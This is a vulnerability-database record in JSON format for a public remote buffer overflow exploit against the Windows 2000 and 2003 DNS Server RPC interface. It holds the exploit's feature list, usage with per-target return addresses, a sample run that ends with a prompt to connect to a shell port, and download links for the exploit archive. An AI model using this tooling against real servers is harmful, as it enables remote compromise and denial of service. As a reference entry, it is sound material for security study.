{"href": "https://www.seebug.org/vuldb/ssvid-64631", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64631", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n Exploit v2 features:\r\n - Target Remote port 445 (by default but requires auth)\r\n - Manual target for dynamic tcp port (without auth)\r\n - Automatic search for dynamic dns rpc port\r\n - Local and remote OS fingerprinting (auto target)\r\n - Windows 2000 server and Windows 2003 server (Spanish) supported by default\r\n - Fixed bug with Windows 2003 Shellcode\r\n - Universal local exploit for Win2k (automatic search for opcodes)\r\n - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)\r\n - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)\r\n - Microsoft RPC api used ( who cares? :p )\r\n\r\n\r\nD:\\Programaci\u00c3\u00b3n\\DNSTEST>dnstest\r\n --------------------------------------------------------------\r\n Microsoft Dns Server local & remote RPC Exploit code\r\n Exploit code by Andres Tarasco & Mario Ballano\r\n Tested against Windows 2000 server SP4 and Windows 2003 SP2\r\n --------------------------------------------------------------\r\n\r\n Usage: dnstest -h 127.0.0.1 (Universal local exploit)\r\n dnstest -h host [-t id] [-p port]\r\n Targets:\r\n 0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)\r\n 1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )\r\n 2 (0x7c4fedbb) - Win2k server SP4 English\r\n 3 (0x7963edbb) - Win2k server SP4 Italian\r\n 4 (0x41414141) - Windows all Denial of Service\r\n\r\n\r\nD:\\Programaci\u00c3\u00b3n\\DNSTEST>dnstest.exe -h 192.168.1.2\r\n --------------------------------------------------------------\r\n Microsoft Dns Server local & remote RPC Exploit code\r\n Exploit code by Andres Tarasco & Mario Ballano\r\n Tested against Windows 2000 server SP4 and Windows 2003 SP2\r\n --------------------------------------------------------------\r\n\r\n[+] Trying to fingerprint target.. (05.02)\r\n[+] Remote Host identified as Windows 2003\r\n[-] No port selected. Trying Ninja sk1llz\r\n[+] Binding to ncacn_ip_tcp: 192.168.1.2\r\n[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0\r\n[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]\r\n[+] Dynamic DNS rpc port found (1105)\r\n[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]\r\n[+] RpcBindingFromStringBinding success\r\n[+] Sending Exploit code to DnssrvOperation()\r\n[+] Now try to connect to port 4444\r\n\r\n\r\nalso available at\r\n\r\nhttp://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip\r\nhttp://www.48bits.com/exploits/dnsxpl.v2.1.zip \r\nhttp://www.exploit-db.com/sploits/04172007-dnsxpl.v2.1.zip\r\n\r\n# milw0rm.com [2007-04-18]\r\n\n ", "id": "SSV:64631", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:18:10", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645442199}}